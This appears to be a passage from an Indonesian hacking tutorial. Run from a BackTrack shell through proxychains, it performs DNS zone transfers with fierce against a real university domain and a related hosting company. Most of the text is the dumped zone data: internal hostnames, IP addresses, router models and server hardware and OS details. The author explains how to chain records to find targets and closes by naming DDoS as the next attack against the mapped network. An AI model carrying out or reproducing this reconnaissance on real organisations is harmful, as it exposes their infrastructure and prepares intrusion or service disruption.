bima.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
blocked.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
calendar.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
cc.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
dataku.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
db.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
devel.dinus.ac.id.	86400	IN	A	103.246.107.67
dkv.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
dncc.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
doscom.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
dosen.dinus.ac.id.	86400	IN	A	103.246.107.33
dosen.dinus.ac.id.	86400	IN	MX	22 mailserver.dinus.ac.id.
dss.dinus.ac.id.	86400	IN	A	103.246.107.77
dss.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
dss.dinus.ac.id.	86400	IN	TXT	"PC-Router"
e-gamelanku.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
ecollege.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
eprints.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
fbs.dinus.ac.id.	86400	IN	A	103.246.107.34
fbs.dinus.ac.id.	86400	IN	MX	29 mailserver.dinus.ac.id.
fe.dinus.ac.id.	86400	IN	A	103.246.107.34
fe.dinus.ac.id.	86400	IN	MX	26 mailserver.dinus.ac.id.
fik.dinus.ac.id.	86400	IN	A	103.246.107.34
fik.dinus.ac.id.	86400	IN	MX	25 mailserver.dinus.ac.id.
files.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
fkm.dinus.ac.id.	86400	IN	A	103.246.107.34
fkm.dinus.ac.id.	86400	IN	MX	28 mailserver.dinus.ac.id.
freemail.dinus.ac.id.	86400	IN	CNAME	siteurl.everyone.net.
ft.dinus.ac.id.	86400	IN	A	103.246.107.34
ft.dinus.ac.id.	86400	IN	MX	27 mailserver.dinus.ac.id.
ftp.dinus.ac.id.	86400	IN	CNAME	gateway.dinus.ac.id.
gateway.dinus.ac.id.	86400	IN	A	103.246.107.30
gateway.dinus.ac.id.	86400	IN	HINFO	"iCore2Duo-2800MHz/2GB" "Linux"
gateway.dinus.ac.id.	86400	IN	TXT	"Gateway Utama"
groups.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
highground.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
hmti.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
_sipfederationtls._tcp.dinus.ac.id.dinus.ac.id.	86400	IN	SRV	10 2 5061 federation.messenger.msn.com.
igos.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
ikc.dinus.ac.id.	86400	IN	CNAME	hostingserver1.dinustech.net.
voip.inherent.dinus.ac.id.	86400	IN	RP	admin.dinus.ac.id. bhian.dinus.ac.id.
voip.inherent.dinus.ac.id.	86400	IN	A	167.205.134.50
intranet.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
irc.dinus.ac.id.	86400	IN	CNAME	gateway.dinus.ac.id.
kms.dinus.ac.id.	86400	IN	A	103.246.107.59
komunitas.dinus.ac.id.	86400	IN	CNAME	ccommunity.everyone.net.
kpm.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
kuliah.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
kulino.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
lgb.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
library.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
localhost.dinus.ac.id.	86400	IN	A	127.0.0.1
lppm.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
mahasiswa.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
mail.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
mailserver.dinus.ac.id.	86400	IN	A	103.246.107.36
mailserver.dinus.ac.id.	86400	IN	HINFO	"iPXeon-1860MHz/2048MB" "Linux"
mailserver.dinus.ac.id.	86400	IN	TXT	"MailServer Utama"
maps.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
mcollege.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
mhs.dinus.ac.id.	86400	IN	MX	32 mailserver.dinus.ac.id.
milis.dinus.ac.id.	86400	IN	MX	24 mailserver.dinus.ac.id.
milisarchive.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
mobile.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
ns1.dinus.ac.id.	86400	IN	A	103.246.107.10
ns1.dinus.ac.id.	86400	IN	HINFO	"iPIV-2GHz/1024MB" "Linux"
ns1.dinus.ac.id.	86400	IN	TXT	"NS Server Utama"
ns2.dinus.ac.id.	86400	IN	A	103.246.107.67
ns2.dinus.ac.id.	86400	IN	HINFO	"iP-Xeon-1.8GHz/2G" "Linux"
ns2.dinus.ac.id.	86400	IN	TXT	"NS1 DiNusTech"
ns3.dinus.ac.id.	86400	IN	A	103.246.107.15
ns3.dinus.ac.id.	86400	IN	HINFO	"iPII-400MHz/192MB" "Linux"
ns3.dinus.ac.id.	86400	IN	TXT	"Name Server 3"
ns4.dinus.ac.id.	86400	IN	A	66.252.5.14
paguyuban-rayon1.dinus.ac.id.	86400	IN	CNAME	hostingserver1.dinustech.net.
pascasarjana.dinus.ac.id.	86400	IN	A	103.246.107.35
phki.dinus.ac.id.	86400	IN	CNAME	webhost.dinustech.com.
photos.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
pinguin.dinus.ac.id.	86400	IN	A	103.246.107.62
pinguin.dinus.ac.id.	86400	IN	HINFO	"VPServer" "WhiteTea"
pinguin.dinus.ac.id.	86400	IN	TXT	"Pinguin FOSS Repository - by DOSCOM"
pmb.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
poli.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
ppd.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
pps.dinus.ac.id.	86400	IN	A	103.246.107.35
pps.dinus.ac.id.	86400	IN	HINFO	"iP-Xeon-2GHz/2G" "Linux"
pps.dinus.ac.id.	86400	IN	TXT	"Server Pasca Sarjana"
pps.dinus.ac.id.	86400	IN	MX	30 mailserver.dinus.ac.id.
elearning.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
research.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
riset.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
scele.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
siadin.pps.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
pps2.dinus.ac.id.	86400	IN	CNAME	pascasarjana.dinus.ac.id.
profile.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
proxy.dinus.ac.id.	86400	IN	A	103.246.107.37
proxy.dinus.ac.id.	86400	IN	HINFO	"iPXeonQuadCore-2GHz/2048MB" "Linux"
proxy.dinus.ac.id.	86400	IN	TXT	"Proxy Utama"
psi.dinus.ac.id.	86400	IN	A	103.246.107.34
psi.dinus.ac.id.	86400	IN	MX	34 mailserver.dinus.ac.id.
public.dinus.ac.id.	86400	IN	MX	60 sitemail.everyone.net.
riset.dinus.ac.id.	86400	IN	MX	21 mailserver.dinus.ac.id.
router.dinus.ac.id.	86400	IN	A	103.246.107.2
router.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "RB1100"
router.dinus.ac.id.	86400	IN	TXT	"Router Universitas"
router-utama.dinus.ac.id.	86400	IN	A	103.246.107.1
router-utama.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
router-utama.dinus.ac.id.	86400	IN	TXT	"PC-RouterOS - Router Utama"
search.dinus.ac.id.	86400	IN	CNAME	csearch.everyone.net.
semnas-fbs.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
siadin.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
siakad.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
silih.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
simpeg.dinus.ac.id.	86400	IN	CNAME	webserver.dinus.ac.id.
skydrive.dinus.ac.id.	86400	IN	CNAME	go.domains.live.com.
staff.dinus.ac.id.	86400	IN	MX	23 mailserver.dinus.ac.id.
streaming.dinus.ac.id.	86400	IN	A	103.246.107.61
streaming.dinus.ac.id.	86400	IN	HINFO	"iPIV-2800MHz/3GB" "M$ Windows"
streaming.dinus.ac.id.	86400	IN	TXT	"Server Streaming TVKU"
svn.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
tvku.dinus.ac.id.	86400	IN	MX	33 mailserver.dinus.ac.id.
ukm.dinus.ac.id.	86400	IN	A	103.246.107.34
ukm.dinus.ac.id.	86400	IN	MX	31 mailserver.dinus.ac.id.
vc1.dinus.ac.id.	86400	IN	A	103.246.107.60
vc1.dinus.ac.id.	86400	IN	HINFO	"Mikrotik" "MT"
vc1.dinus.ac.id.	86400	IN	TXT	"RouterOS"
vicon1.dinus.ac.id.	86400	IN	A	103.246.107.60
vpn.dinus.ac.id.	86400	IN	CNAME	vc1.dinus.ac.id.
webmail.dinus.ac.id.	86400	IN	CNAME	mailserver.dinus.ac.id.
webmail2.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail3.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail4.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webmail5.dinus.ac.id.	86400	IN	CNAME	webpsi.dinus.ac.id.
webpsi.dinus.ac.id.	86400	IN	A	103.246.107.33
webpsi.dinus.ac.id.	86400	IN	HINFO	"iPXeon-X5670-2930MHz/32GB" "Linux"
webpsi.dinus.ac.id.	86400	IN	TXT	"Sistem Informasi Akademik - PSI"
webserver.dinus.ac.id.	86400	IN	A	103.246.107.34
webserver.dinus.ac.id.	86400	IN	HINFO	"iPDualCore-3GHz/1024MB" "Linux"
webserver.dinus.ac.id.	86400	IN	TXT	"WebServer Utama"
www.dinus.ac.id.	86400	IN	CNAME	dinus.ac.id.

There isn't much point continuing, you have everything.
Have a nice day.
Exiting...

nah, keliatan jelas kan, ini akibat misconfiguration di server DNS, sehingga mapping server terlihat semua.

oke kita bahas salah satu, karena ngurutin mapping dns itu simple.

admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.

CNAME ke webserver.dinustech.com, so kita cari hasil dari NS query di webserver.dinustech.com, dalam kasus ini kita fierce lagi domain baru yaitu dinustech.com

root@bt:/pentest/enumeration/dns/fierce# proxychains perl fierce.pl -dns dinustech.com
ProxyChains-3.1 (http://proxychains.sf.net)
DNS Servers for dinustech.com:
	ns3.dinustech.net
	ns2.dinustech.net
	ns1.dinustech.net
	ns4.dinustech.net

Trying zone transfer first...
	Testing ns3.dinustech.net
		Request timed out or transfer not allowed.
	Testing ns2.dinustech.net

Whoah, it worked - misconfigured DNS server found:
dinustech.com.	86400	IN	SOA	ns1.dinustech.net. admin.dinustech.net. (
					2012011741	; Serial
					10800	; Refresh
					3600	; Retry
					604800	; Expire
					86400 )	; Minimum TTL
dinustech.com.	86400	IN	MX	10 mailserver.dinustech.com.
dinustech.com.	86400	IN	NS	ns1.dinustech.net.
dinustech.com.	86400	IN	NS	ns2.dinustech.net.
dinustech.com.	86400	IN	NS	ns3.dinustech.net.
dinustech.com.	86400	IN	NS	ns4.dinustech.net.
dinustech.com.	86400	IN	A	103.246.107.66
blocked.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
demomdl.dinustech.com.	86400	IN	CNAME	webhost.dinustech.com.
domreg.dinustech.com.	86400	IN	RP	admin.dinustech.net. bhian.dinustech.net.
domreg.dinustech.com.	86400	IN	A	67.15.47.4
hotspot.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
isp.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
localhost.dinustech.com.	86400	IN	A	127.0.0.1
mail.dinustech.com.	86400	IN	CNAME	mailserver.dinustech.com.
mailserver.dinustech.com.	86400	IN	A	103.246.107.36
noc.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
ntt-trial.dinustech.com.	86400	IN	CNAME	webhost.dinustech.com.
poltekkes.dinustech.com.	86400	IN	A	103.246.107.94
ppdsmg.dinustech.com.	86400	IN	CNAME	webserver.dinus.ac.id.
svn.dinustech.com.	86400	IN	CNAME	webserver.dinustech.com.
vps.dinustech.com.	86400	IN	A	183.91.86.249
webhost.dinustech.com.	86400	IN	A	103.246.107.67
webserver.dinustech.com.	86400	IN	A	103.246.107.66
www.dinustech.com.	86400	IN	CNAME	webserver.dinus.ac.id.

There isn't much point continuing, you have everything.
Have a nice day.
Exiting...

sip keliatan jelas bahwa ip server dari webserver.dinustech.com ialah alias dari 103.246.107.66, so kita bisa urutin sebagai berikut :

admin.dinus.ac.id.	86400	IN	CNAME	webserver.dinustech.com.
webserver.dinustech.com.	86400	IN	A	103.246.107.66

lalu apa beda nya sama ping? jelas beda, dengan melakukan scanning DNS kita bisa dapat banyak target dan sistem dan mapping network target, karena ping hanya mengeluarkan ip saja, tidak ada output selain touch time, contoh output bonus :

webpsi.dinus.ac.id.	86400	IN	A	103.246.107.33
webpsi.dinus.ac.id.	86400	IN	HINFO	"iPXeon-X5670-2930MHz/32GB" "Linux"
webpsi.dinus.ac.id.	86400	IN	TXT	"Sistem Informasi Akademik - PSI"

----------8<------snip

streaming.dinus.ac.id.	86400	IN	A	103.246.107.61
streaming.dinus.ac.id.	86400	IN	HINFO	"iPIV-2800MHz/3GB" "M$ Windows"
streaming.dinus.ac.id.	86400	IN	TXT	"Server Streaming TVKU"

----------8<------snip

proxy.dinus.ac.id.	86400	IN	A	103.246.107.37
proxy.dinus.ac.id.	86400	IN	HINFO	"iPXeonQuadCore-2GHz/2048MB" "Linux"
proxy.dinus.ac.id.	86400	IN	TXT	"Proxy Utama"

etc..

well tipe serangan lanjutan dari dns mapping / scanning ialah DDOS / membuat salah satu dari struktur network target lumpuh, sehingga bisa menyebabkan keseluruhan / salah satu service web bisa mati.

Good Luck! ;p